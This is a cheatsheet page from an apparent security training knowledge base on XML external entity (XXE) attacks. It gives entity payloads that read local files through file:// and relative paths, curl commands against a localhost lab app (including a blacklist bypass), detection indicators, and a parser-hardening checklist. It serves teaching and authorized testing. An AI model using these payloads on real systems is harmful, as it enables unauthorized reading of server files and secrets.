Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter III - Web / 07. XXE

Cheatsheet

Use this as a quick reference while testing XXE in labs and authorized assessments.


Common Targets

XML API endpoint
SOAP service
SAML parser
RSS parser
SVG upload processor
DOCX/XLSX/PPTX importer
PDF converter
configuration import
legacy integration endpoint

Quick Probes

Normal XML:

<order>
  <item>Signal Mug</item>
  <quantity>1</quantity>
  <note>normal order</note>
</order>

Internal entity:

<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY proof "ootw-entity-proof">
]>
<order>
  <item>&proof;</item>
  <quantity>1</quantity>
  <note>test</note>
</order>

Relative external entity:

<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY proof SYSTEM "../private/device-config.txt">
]>
<order>
  <item>Signal Mug</item>
  <quantity>1</quantity>
  <note>&proof;</note>
</order>

Lab curl Checks

Create the absolute-path payload:

LAB_DIR="$(pwd)"
cat > xxe-basic.xml <<EOF
<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY proof SYSTEM "file://$LAB_DIR/lab_xml/private/device-config.txt">
]>
<order>
  <item>Signal Mug</item>
  <quantity>1</quantity>
  <note>&proof;</note>
</order>
EOF

Basic exploit:

curl -i -X POST "http://127.0.0.1:5000/xxe/basic" \
  -H "Content-Type: application/xml" \
  --data-binary @xxe-basic.xml

Create the relative-path payload:

cat > xxe-relative.xml <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY proof SYSTEM "../private/device-config.txt">
]>
<order>
  <item>Signal Mug</item>
  <quantity>1</quantity>
  <note>&proof;</note>
</order>
EOF

Weak blacklist bypass:

curl -i -X POST "http://127.0.0.1:5000/xxe/blacklist" \
  -H "Content-Type: application/xml" \
  --data-binary @xxe-relative.xml

Network-disabled local file read:

curl -i -X POST "http://127.0.0.1:5000/xxe/better" \
  -H "Content-Type: application/xml" \
  --data-binary @xxe-relative.xml

Fixed route:

curl -i -X POST "http://127.0.0.1:5000/xxe/fixed" \
  -H "Content-Type: application/xml" \
  --data-binary @xxe-relative.xml

The fixed route should return 400 Bad Request.


Indicators

Look for:

DOCTYPE
ENTITY
SYSTEM
PUBLIC
file://
http://
https://
parameter entities
parser errors
expanded entity text

Parser Behavior

Dangerous behavior:

DTD loading enabled
external entity resolution enabled
network access enabled
XInclude enabled
verbose XML errors

Safer behavior:

DTD loading disabled
external entity resolution disabled
network access disabled
DOCTYPE rejected
strict schema validation after parser hardening

Defensive Review

Confirm:

  • The parser does not load DTDs from untrusted XML.
  • The parser does not resolve external entities.
  • The parser cannot make network requests.
  • DOCTYPE is rejected when not required.
  • XML errors do not leak sensitive filesystem details.
  • XML-based upload formats are parsed with hardened settings.
  • Outbound requests from application servers are restricted.
  • Rejected entity payloads are logged.